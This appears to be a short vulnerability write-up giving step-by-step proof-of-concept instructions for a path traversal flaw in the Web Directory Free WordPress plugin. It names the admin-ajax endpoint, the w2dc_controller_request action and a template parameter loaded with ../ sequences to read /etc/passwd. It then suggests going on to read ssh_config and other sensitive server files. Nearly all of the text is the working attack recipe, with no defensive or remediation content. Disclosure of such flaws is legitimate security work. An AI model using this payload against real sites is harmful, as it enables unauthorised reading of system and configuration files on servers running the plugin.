BOOK THIS SPACE FOR AD
ARTICLE ADSteps to Reproduce & Proof of Concept (POC)
1. Install and Activate the Web Directory Free plugin on your WordPress site
2. Use the [webdirectory-search] shortcode provided by the plugin to create a post that displays a directory listing
3. Use the Repeater tab in Burp Suite to send a POST request to the endpoint:
POST /wp-admin/admin-ajax.php4. Insert the following parameter in the request body:
action=w2dc_controller_request5. Observe the server’s response for signs of how the action parameter is processed
6. Add a template parameter to the request body and include a dot-dot-slash (../) to test the vulnerability
action=w2dc_controller_request&template=../7. Keep appending ../ until you reach and display the contents of the /etc/passwd file
../../../../../etc/passwd8. After confirming the vulnerability, explore sensitive files such as the SSH configuration (ssh_config) or other critical files on the server